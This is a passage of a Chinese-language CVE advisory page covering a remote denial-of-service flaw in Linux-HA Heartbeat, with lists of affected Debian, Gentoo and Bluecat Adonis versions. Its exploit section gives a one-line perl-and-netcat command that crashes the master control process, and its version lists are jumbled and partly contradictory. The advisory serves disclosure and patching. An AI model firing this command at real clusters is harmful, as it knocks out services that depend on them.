 - Debian Linux 3.0 ia-64
 - Debian Linux 3.0 ia-32
 - Debian Linux 3.0 hppa
 - Debian Linux 3.0 arm
 - Debian Linux 3.0 alpha
 - Debian Linux 3.0
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Bluecat Networks Adonis XHA 5.0.2 .8
Bluecat Networks Adonis 500
Bluecat Networks Adonis 1000
Linux-HA heartbeat 2.0.7
Linux-HA heartbeat 1.2.5
Bluecat Networks Adonis (Firmware) 5.0.5

- 不受影响的程序版本

Linux-HA heartbeat 2.0.7
Linux-HA heartbeat 1.2.5
Bluecat Networks Adonis (Firmware) 5.0.5

- 漏洞讨论

Linux-HA Heartbeat is prone to a remote denial-of-service vulnerability.

By successfully exploiting this issue, attackers can crash the master control process. This may result in the failure of services that depend on the application's functionality.

- 漏洞利用

The following command, provided by defaultroute, is reportedly sufficient to trigger this issue:

perl -e 'print "###\n2147483647heart attack:%%%\n"' | nc -u 192.168.1.12 694

- 解决方案

The vendor has released an upgrade that addresses this issue.

Please see the associated advisories for more information.


Linux-HA heartbeat 0.4.9 a

Linux-HA heartbeat 0.4.9 .1

Linux-HA heartbeat 0.4.9 c

Linux-HA heartbeat 0.4.9

Linux-HA heartbeat 0.4.9 b

Linux-HA heartbeat 0.9.4 d

Linux-HA heartbeat 0.9.4

Linux-HA heartbeat 1.2.2

Linux-HA heartbeat 1.2.3

Linux-HA heartbeat 1.2.4

Linux-HA heartbeat 2.0

Linux-HA heartbeat 2.0.1

Linux-HA heartbeat 2.0.2

Linux-HA heartbeat 2.0.3

Linux-HA heartbeat 2.0.4

Linux-HA heartbeat 2.0.5

Linux-HA heartbeat 2.0.6

- 相关参考

 

 

CVE数据库

检索CVE



关于CVE

CVE资源

Wise Words

image 设计是一个发现问题,而不是发现解决方案的过程。image

-- Leslie Chicoine

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站
© Copyright 2014 @evan-css. CCERT.

京ICP备14000297号-2